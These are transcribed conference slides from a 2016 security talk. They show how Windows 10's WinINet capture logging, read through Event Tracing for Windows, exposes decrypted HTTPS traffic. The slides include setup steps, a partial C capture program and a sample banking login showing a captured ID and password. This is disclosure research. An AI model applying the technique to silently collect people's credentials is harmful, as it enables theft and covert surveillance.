Intercept HTTPS Traffic on Windows 10
-
Upload
soya-aoyama -
Category
Technology
-
view
48 -
download
0
Transcript of Intercept HTTPS Traffic on Windows 10
INTERCEPT HTTPS TRAFFIC
ON WINDOWS10
AVTOKYO 2016Oct. 22th 2016
ABOUT ME
• Soya Aoyama (AO)
•Security researcher who LOVES FRONTALE and DRINK
• Work at Fujitsu System Integration Laboratories Ltd. (Since 2014- )
• https://www.facebook.com/soya.aoyama.3
2
INTRODUCTION
This slide includes some fictions,
and has partially no relation to actual persons, entities etc.
3
CONVERSATION BETWEEN A TWO (1)
4
Hi Bill, I heard that a great function was
added to Windows10, correct?Well, yes, Tim
The function to expose attackers’
behaviorsWow.
What’s the function in particular?
Capture the full WinINet trafficIt can be checked through event viewer.
HOW TO CHECK
1. Open event viewer and select below“Applications and Services Logs”
“Microsoft”
“Windows”
“WinINet (Microsoft-Windows-WinINet-Capture)”
“Capture/Analytic”
2. Click “Enable Log” and Enable logs
3. Start Edge and access WEB services
5
THE RESULT
Details of Event viewer
6
CONVERSATION BETWEEN A TWO (2)
7
Where are the captured data stored?
It’s in the Payload in the Details
It’s like cypher text and incomprehensible,
isn’t it?
A-a-I c-c-can find by eyes
STRING CONVERSION
1. Copy the contents of Payload
2. Paste intohttp://singoro.net/16henkan/
8
485454502F312E3120323030204F4B0D0A43616368652D436F6E74726F6C3A206E6F2D63616368652C206E6F2D73746F72652C206D7573742D726576616C69646174650D0A507261676D613A206E6F2D63616368650D0A436F6E74656E742D547970653A20746578742F706C61696E0D0A457870697265733A202D310D0A5365727665723A204D6963726F736F66742D4949532F382E350D0A533A20434831415050455830393436360D0A4163636573732D436F6E74726F6C2D416C6C6F772D4F726967696E3A202A0D0A4163636573732D436F6E74726F6C2D416C6C6F772D486561646572733A20436F6E74656E742D547970650D0A4163636573732D436F6E74726F6C2D416C6C6F772D4D6574686F64733A20504F53542C204745542C204F5054494F4E532C20484541440D0A4163636573732D436F6E74726F6C2D4D61782D4167653A2032313630300D0A446174653A205468752C2030382053657020323031362030353A34323A313820474D540D0A436F6E74656E742D4C656E6774683A20300D0A0D0A
HTTP/1.1 200 OKCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheContent-Type: text/plainExpires: -1Server: Microsoft-IIS/8.5S: CH1APPEX09466Access-Control-Allow-Origin: *Access-Control-Allow-Headers: Content-TypeAccess-Control-Allow-Methods: POST, GET, OPTIONS, HEADAccess-Control-Max-Age: 21600Date: Thu, 08 Sep 2016 05:42:18 GMTContent-Length: 0
CONVERSATION BETWEEN A TWO (3)
9
It seems really captured… but no time to
convert per packet, right?No worries.It‘s designed to be captured from
ApplicationsWell done, Bill. You never miss a trick.
How do you realize?
I use Event Tracing for Windows (ETW)
SOURCE PROGRAM
10
Application to capture WinINet contents in real time.#include <Windows.h>#include <Evntrace.h>#include <stdio.h>#include <wchar.h>#include <tdh.h>
TRACEHANDLE controllerHandle = INVALID_PROCESSTRACE_HANDLE;LPWSTR sessionName = L"Microsoft-Windows-WinInet-Capture";HANDLE event = NULL;
EXTERN_C __declspec(selectany) const GUID PROVIDERID_Microsoft_Windows_WinInet_Capture = { 0xa70ff94f, 0x570b, 0x4979,{ 0xba,0x5c, 0xe5, 0x9c, 0x9f, 0xea, 0xb6, 0x1b } };
// イベントコールバックvoid WINAPI EventRecordCallback(PEVENT_RECORD EventRecord) {
if (TRUE == IsEqualGUID(PROVIDERID_Microsoft_Windows_WinInet_Capture, EventRecord->EventHeader.ProviderId)) {char *UserData = (char *)malloc(EventRecord->UserDataLength);memset(UserData, 0, EventRecord->UserDataLength);memcpy(UserData, (PBYTE)EventRecord->UserData + 0x10, EventRecord->UserDataLength - 0x10);printf("%s\n", UserData);free(UserData);
}}
// コンシューマ用スレッドDWORD WINAPI ThreadProc(LPVOID lpParamater) {
// セッションオープンEVENT_TRACE_LOGFILE logFile = {};logFile.LogFileName = NULL;logFile.LoggerName = sessionName;logFile.ProcessTraceMode = PROCESS_TRACE_MODE_EVENT_RECORD | PROCESS_TRACE_MODE_REAL_TIME;logFile.EventRecordCallback = &EventRecordCallback;
EVENT TRACING FOR WINDOWS
Microsoft bloghttps://blogs.msdn.microsoft.com/jpwdkblog/2011/12/27/event-tracing-for-windows-etw/
Aetos382’s bloghttp://tech.blog.aerie.jp/archive/category/ETW
11
CONVERSATION BETWEEN A TWO (4)
12
o-o-only requires this much of code…
Super EASY, isn’t it?
I know you apply this to all PCs inside, huh?
What?
USERS WHO DON’T KNOW ANYTHING
13
Access an internet banking site
THE RESULT
_PAGEID=AA011&_SENDTS=1467876489534&_TRANID=AA011_001&_SUBINDEX=-1&_TARGET=MUFGpop_syokai&_FRAMID=&_LUID=LUID&_WINID=root&_TARGETWINID=&DEVICEPRINT=version%253D3%252E4%252E1%252E0%255F1%2526pm%255Ffpua%253Dmozilla%252F5%252E0%2520%2528windows%2520nt%252010%252E0%2529%2520applewebkit%252F537%252E36%2520%2528khtml%252C%2520like%2520gecko%2529%2520chrome%252F46%252E0%252E2486%252E0%2520safari%252F537%252E36%2520edge%252F13%252E10586%257C5%252E0%2520%2528Windows%2520NT%252010%252E0%2529%2520AppleWebKit%252F537%252E36%2520%2528KHTML%252C%2520like%2520Gecko%2529%2520Chrome%252F46%252E0%252E2486%252E0%2520Safari%252F537%252E36%2520Edge%252F13%252E10586%257CWin32%2526pm%255Ffpsc%253D24%257C1729%257C864%257C824%2526pm%255Ffpsw%253D%2526pm%255Ffptz%253D9%2526pm%255Ffpln%253Dlang%253Dja%252DJP%257Csyslang%253D%257Cuserlang%253D%2526pm%255Ffpjv%253D1%2526pm%255Ffpco%253D1%2526pm%255Ffpasw%253Dflash%257C%2526pm%255Ffpan%253DNetscape%2526pm%255Ffpacn%253DMozilla%2526pm%255Ffpol%253Dtrue%2526pm%255Ffposp%253D%2526pm%255Ffpup%253D%2526pm%255Ffpsaw%253D1729%2526pm%255Ffpspd%253D24%2526pm%255Ffpsbd%253D0%2526pm%255Ffpsdx%253D96%2526pm%255Ffpsdy%253D96%2526pm%255Ffpslx%253D96%2526pm%255Ffpsly%253D96%2526pm%255Ffpsfse%253Dtrue%2526pm%255Ffpsui%253D%2526pm%255Fos%253DWindows%2526pm%255Fbrmjv%253D46%2526pm%255Fbr%253DChrome%2526pm%255Finpt%253D%2526pm%255Fexpt%253D&KEIYAKU_NO=12345678&PASSWORD=87654321
HTTP/1.1 200 OK
Date: Thu, 07 Jul 2016 07:28:47 GMT
Server: Apache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Pragma: no-cache
Content-length: 11661
Content-Type: text/html;charset=Shift_JIS
Connection: close
14
KEIYAKU_NO=12345678PASSWORD=87654321
15
Amazing.
No encryption or anything…
Yeah.
Even Internal fraud monitoring can be
done.
What about security?
No risks to be abused by attackers?
No worries!! Data Capture is impossible without
administrative privileges.
CONVERSATION BETWEEN A TWO (5)
CONCLUSION
Vulnerabilities that allows privilege elevation…
are found even this year!!
CVE-2016-0099 、CVE-2016-3371
16
Insanely Great!!